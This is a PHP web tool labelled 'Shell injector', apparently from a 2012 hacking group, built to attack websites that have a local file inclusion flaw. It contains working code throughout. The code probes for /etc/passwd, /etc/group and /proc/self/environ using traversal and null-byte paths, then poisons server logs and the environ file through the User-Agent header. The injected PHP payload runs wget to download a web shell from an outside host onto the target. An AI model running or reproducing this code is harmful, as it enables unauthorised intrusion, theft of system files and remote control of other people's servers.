Shell injector

1. <?php
2. /* ~~~~~~~~~~~~~~~~~~~
3. Coded by ZiXeM\Ponyblaze
4. ~~~~~~~~~~~~~~~~~~~~*/
5.  
6. error_reporting(0); ?>
7. <html>
8. <head>
9. <style type='text/css'>
10. body {
11. background-color:#202020;
12. color:White;
13. }
14. input {
15. background-color:White;
16. color:Black;
17. border-color: Black;
18. border-width: 2px;
19. border-style: solid;
20. }
21.  
22. .copyright {
23.     background: -moz-linear-gradient(center bottom , #FFFFFF 0%, #000000 100%) repeat scroll 0 0 padding-box transparent;
24.     border: 1px solid #28343F;
25.     border-radius: 3px 3px 3px 3px;
26.     box-shadow: 0 1px 2px #647384 inset;
27. }
28.  
29. #down {
30.     color: Blue;
31.     font: italic 1em/30px Arial,Helvetica,sans-serif;
32.     height: 20px;
33.     margin: 30px auto 0;
34.     min-width: 300px;
35.     padding: 10px 0;
36.     text-align: center;
37.     width: 30%;
38. }
39. iframe {
40. width: 1px;
41. height: 1px;
42. }
43. .none {
44. display:none;
45. }
46.  
47. textarea {
48. background-color:Black;
49. Color:Cyan;
50. }
51.  
52. .btn {
53. color:Lime;
54. background-color:Black;
55. border-style: solid;
56. border-color:White;
57. border-width:2px;
58. }
59.  
60. </style>
61.  
62. <title>APC-By Zixem.</title>
63. </head>
64. <body>
65.  
66. <center><a href='tools.php'><img src='http://3.bp.blogspot.com/--2rgY92F7SY/T10aCqEvzfI/AAAAAAAAiPc/uwNR2MLpmRE/s320/147092+-+artist+kloudmutt+badass+cigarette+Future_Twilight+twilight_sparkle.png' width='250' height='250' /></a><font color='#202020'>_____</font><br /><u><b><i>Shell injector.</i></b></u></center><p />
67. <center>
68. <form action='p0ison3r_zixem.php' name='form' method='get'>
69. <code>
70. <u>Ex. for vuln good links:</u><br/>
71. <font color='Green'><b>http://www.site.com/index.php?page=</b></font> <br/>
72. <u>Ex. for vuln bad links:</u><br/>
73. <font color='Red'>http://www.site.com/index.php?page=<b><del>about.php</b></del></font><br /><p />
74.  
75. </code>
76. Vuln link: . <td><input type='text' name='url' size='50' value='http://www.site.com/index.php?page=' />
77. <br/>
78. Shell link: <td><input type='text' name='shell' size='50' value='http://creyzistyle.tk/digi7al.txt' />
79. <br />
80. <input class='btn' type='submit' name='Go' value='Start.' />
81. <p />
82. ___________LOG____________
83. <p />
84. </form>
85. <textarea cols='150' rows='20' readonly='readonly'>
86. <?php
87. // Varabiles PART
88.  
89. /*
90. Group file regex:
91.  
92. root:x:0:root
93. bin:x:1:root,bin,daemon
94. daemon:x:2:root,bin,daemon
95. sys:x:3:root,bin,adm
96. adm:x:4:root,adm,daemon
97. tty:x:5:
98.  
99. */
100.  
101. $url=$_GET['url'];
102. $x404=file_get_contents($url."ZiXeM.php");
103.  
104. //$passwd= array("../../../../../../../../../../../../../etc/passwd","/etc/passwd","../etc/passwd","/etc/group","../../../../../../../../../../../etc/group","../../../../../../../../proc/self/environ","/proc/self/environ","../proc/self/environ");
105. $passwd= array('../../../../../../../../../../../../../etc/passwd','/etc/passwd','../etc/passwd','/etc/group','../../../../../../../../../../../etc/group','../../../../../../../../proc/self/environ','/proc/self/environ','../proc/self/environ');
106.  
107. $logfiles= array("../apache/logs/error.log","../apache/logs/access.log","../../apache/logs/error.log","../../apache/logs/access.log","../../../apache/logs/error.log","../../../apache/logs/access.log","../../../../../../../etc/httpd/logs/acces_log","../../../../../../../etc/httpd/logs/acces.log","../../../../../../../etc/httpd/logs/error_log","../../../../../../../etc/httpd/logs/error.log","../../../../../../../var/www/logs/access_log","../../../../../../../var/www/logs/access.log","../../../../../../../usr/local/apache/logs/access_log","../../../../../../../usr/local/apache/logs/access.log","../../../../../../../var/log/apache/access_log","../../../../../../../var/log/apache2/access_log","../../../../../../../var/log/apache/access.log","../../../../../../../var/log/apache2/access.log","../../../../../../../var/log/access_log","../../../../../../../var/log/access.log","../../../../../../../var/www/logs/error_log","../../../../../../../var/www/logs/error.log","../../../../../../../usr/local/apache/logs/error_log","../../../../../../../usr/local/apache/logs/error.log","../../../../../../../var/log/apache/error_log","../../../../../../../var/log/apache2/error_log","../../../../../../../var/log/apache/error.log","../../../../../../../var/log/apache2/error.log","../../../../../../../var/log/error_log","../../../../../../../var/log/error.log","../../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf","/etc/httpd/conf/httpd.conf","/logs/access.log","/logs/error.log");
108. $founded= array('ZiXeM');
109.  
110. if(isset($_GET['Go']) && $_GET['Go']=='Start.') {
111. if(!preg_match("/^http:\/\//",$_GET['url'])) {
112. die("Enter url must be with http:// !\n");
113. }
114.  
115. if(!preg_match("/^http:\/\//",$_GET['shell'])) {
116. die("Enter shell url with http:// !\n");
117. }
118.  
119. echo "Starting...\nTarget: {$_GET['url']}\n====================\n\n";
120. foreach($passwd as $checker) {
121. $x=file_get_contents($url.$checker."%00");
122. $x1=file_get_contents($url.$checker."%0A");
123. $x2=file_get_contents($url.$checker);
124. if(preg_match("/bin:x:1:1:bin:\/bin:\/sbin\/nologin/",$x) || preg_match("/bin:x:1:1:bin:\/bin:\/sbin\/nologin/",$x1) || preg_match("/bin:x:1:1:bin:\/bin:\/sbin\/nologin/",$x2)) {
125. $groupfile=TRUE;
126. }
127. if(preg_match("/DOCUMENT_ROOT=\//",$x) || preg_match("/DOCUMENT_ROOT=\//",$x1) || preg_match("/DOCUMENT_ROOT=\//",$x2)) {
128. $environfile=TRUE;
129. }
130. if(preg_match("/bin:x:1:root,bin,daemon/",$x) || preg_match("/root:x:0:0:root:\/root:\/bin\/bash/",$x) || preg_match("/bin:x:1:root,bin,daemon/",$x1) || preg_match("/root:x:0:0:root:\/root:\/bin\/bash/",$x1) || preg_match("/bin:x:1:root,bin,daemon/",$x2) || preg_match("/root:x:0:0:root:\/root:\/bin\/bash/",$x2)) {
131. $passwdfile=TRUE;
132. }
133. }
134. if($groupfile==TRUE) { echo "[/etc/group] -> \tAvailable.\n"; } else { echo "[/etc/group] -> \tUnavailable.\n"; }
135. if($passwdfile==TRUE) { echo "[/etc/passwd] -> \tAvailable.\n";} else { echo "[/etc/passwd] -> \tUnavailable.\n"; }
136. if($environfile==TRUE) { echo "[/proc/self/environ] -> Available.\n";} else { echo "[/proc/self/environ] -> Unavailable.\n"; }
137.  
138. /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ PART OF SCANNING THE LOG FILES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
139. // Word for Regex:   HTTP/1.1
140.  
141. foreach($logfiles as $logfile) {
142. $y=file_get_contents($url.$logfile);
143. if(preg_match("/HTTP\/1.1/i",$y)) {
144. echo "[Log file]: ->\t".$url.$logfile."%00\n";
145. $founded[]=$url.$logfile."%00";
146. }
147. else { $log_found=FALSE; }
148. }
149. if($log_found==FALSE && $environfile==TRUE) {
150.  
151.  echo "[Log file]: ->\tNot found.\n\nTrying /proc/self/environ method....\n";
152.  
153. $inject_num_2 = curl_init();
154. curl_setopt($inject_num_2, CURLOPT_URL, $url."../../../../../../../../../proc/self/environ");
155. curl_setopt($inject_num_2, CURLOPT_HEADER, 1);
156. curl_setopt($inject_num_2, CURLOPT_USERAGENT, "<?php shell_exec('wget {$_GET['shell']} -O 404ZIX.php'); ?>");
157. echo "</textarea>";
158. echo "<div class='none'>";
159. $final_exec=curl_exec($inject_num_2);
160. echo "</div>";
161. curl_close($inject_num_2);
162. $inject_num_3 = curl_init();
163. curl_setopt($inject_num_3, CURLOPT_URL, $url."../../../../../../../../../proc/self/environ%00");
164. curl_setopt($inject_num_3, CURLOPT_HEADER, 1);
165. curl_setopt($inject_num_3, CURLOPT_USERAGENT, "<?php shell_exec('wget {$_GET['shell']} -O 404ZIX.php'); ?>");
166. echo "<div class='none'>";
167. $final_exec3=curl_exec($inject_num_3);
168. echo "</div>";
169.  
170. $inject_num_4 = curl_init();
171. curl_setopt($inject_num_4, CURLOPT_URL, $url."/proc/self/environ%00");
172. curl_setopt($inject_num_4, CURLOPT_HEADER, 1);
173. curl_setopt($inject_num_4, CURLOPT_RETURNTRANSFER, 1);
174. curl_setopt($inject_num_4, CURLOPT_USERAGENT, "<?php shell_exec('wget {$_GET['shell'] } -O 404ZIX.php'); ?>");
175. echo "<div class='none'>";
176. $final_exec4=curl_exec($inject_num_4);
177. echo "</div>";
178.  
179. echo "<br />";
180. //echo "<br /><textarea cols='50' rows='5'>";
181. // close cURL resource, and free up system resources
182. curl_close($inject_num_3);
183. if($inject_num_2==TRUE || $inject_num_3==TRUE || $inject_num_4==TRUE) {
184. die("<pre>[<font color='Lime'><b>+</b></font>] -> Chance the shell injected: [<font color='Red'><b>50%</font></b>]...the shell named 404ZIX.php\n<b>{$url}<font color='Red'>404ZIX.php</b></font>\n==============\nThanks for using ZiXeM's shell injector.</pre>");
185.  }
186. else { die("</div>Failed...sorry :S <div id='none'>"); flush(); ob_flush(); }
187.  }
188.  if($logfile==TRUE) {
189.  
190.  
191. //echo file_get_contents("{$url}/proc/self/environ");
192. ?>
193. <?php
194. //$_SERVER['HTTP_USER_AGENT']="<h1>HeyThere</h1>";
195. //echo "<iframe src='{$url}/proc/self/environ'></iframe>";
196. //echo "</textarea>";
197. file_get_contents($url."<?php shell_exec('wget {$_GET['shell']} -O 404ZIX.php'); ?>");
198. file_get_contents($founded[1]);
199. echo "<iframe src='{$founded[1]}'></iframe>";
200. echo "<textarea class='none'>";
201. }
202. else { echo "/*~~~~~~~~~~~~*/\n[-] -> Sorry...shell uploading failed.\n================\nZiXeM.\n</textarea>";  }
203. }
204. ?>
205. </textarea>
206.  
207. <div id='down' class='copyright'>Copyright 2012 ZiXeM from Team Digi<font color='Red'><b>7</b></font>al</b>
208. </center>
209. </body>
210. </html>